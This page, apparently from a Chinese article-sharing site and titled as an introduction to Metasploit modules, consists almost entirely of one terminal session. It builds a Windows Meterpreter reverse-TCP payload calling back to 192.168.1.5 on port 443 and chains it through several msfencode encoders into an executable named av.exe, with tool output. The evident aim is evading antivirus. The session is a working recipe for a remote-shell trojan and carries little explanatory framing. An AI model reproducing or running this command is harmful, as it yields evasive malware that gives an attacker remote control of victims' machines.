打开APP
userphoto
未登录

开通VIP,畅享免费电子书等14项超值服

开通VIP
Metasploit的模块构成及功能介绍
exploit@ubuntu:/pentest/framework3$ msfpayload 
windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 R | 
msfencode -e x86/shikata_ga_nai -c 7 -t raw | msfencode -e x86/bloxor -c
 3 -t raw | msfencode -e x86/countdown -c 5 -t exe -o av.exe[!] 
************************************************************************[!]
  
************************************************************************[!]
  
************************************************************************[!] *               The utility msfencode is deprecated!                   *[!] *              It will be removed on or about 2015-06-08               *[!] *                   Please use msfvenom instead                        *[!] *  Details: https://github.com/rapid7/metasploit-framework/pull/4333   *[!] ************************************************************************
[!] *               The utility msfencode is deprecated!                   *[!] *              It will be removed on or about 2015-06-08               *[!] *                   Please use msfvenom instead                        *[!] *  Details: https://github.com/rapid7/metasploit-framework/pull/4333   *[!] ************************************************************************
[!] *               The utility msfpayload is deprecated!                  *[!] *              It will be removed on or about 2015-06-08               *[!] *                   Please use msfvenom instead                        *[!] *  Details: https://github.com/rapid7/metasploit-framework/pull/4333   *[!] ************************************************************************[!] ************************************************************************[!] *               The utility msfencode is deprecated!                   *[!] *              It will be removed on or about 2015-06-08               *[!] *                   Please use msfvenom instead                        *[!] *  Details: https://github.com/rapid7/metasploit-framework/pull/4333   *[!] ************************************************************************[*] x86/shikata_ga_nai succeeded with size 308 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 335 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 362 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 389 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 416 (iteration=5)
[*] x86/shikata_ga_nai succeeded with size 443 (iteration=6)
[*] x86/shikata_ga_nai succeeded with size 470 (iteration=7)
[*] x86/bloxor succeeded with size 547 (iteration=1)
[*] x86/bloxor succeeded with size 617 (iteration=2)
[*] x86/bloxor succeeded with size 677 (iteration=3)
[*] x86/countdown succeeded with size 695 (iteration=1)
[*] x86/countdown succeeded with size 713 (iteration=2)
[*] x86/countdown succeeded with size 731 (iteration=3)
[*] x86/countdown succeeded with size 749 (iteration=4)
[*] x86/countdown succeeded with size 767 (iteration=5)
本站仅提供存储服务,所有内容均由用户发布,如发现有害或侵权内容,请点击举报
打开APP,阅读全文并永久保存 查看更多类似文章
猜你喜欢
类似文章
【热】打开小程序,算一算2024你的财运
Metasploit Framework生成编码后的exe文件
当Strust2遇到防火墙,你的思路够骚吗?
利用msfvenom生成木马程序
渗透测试-木马免杀的几种方式
【深度学习概念理解】epoch、iteration、batch_size、episode通俗理解
MOD 之"Hello World"
更多类似文章 >>
生活服务
热点新闻
分享 收藏 导长图 关注 下载文章
绑定账号成功
后续可登录账号畅享VIP特权!
如果VIP功能使用有故障,
可点击这里联系客服!

联系客服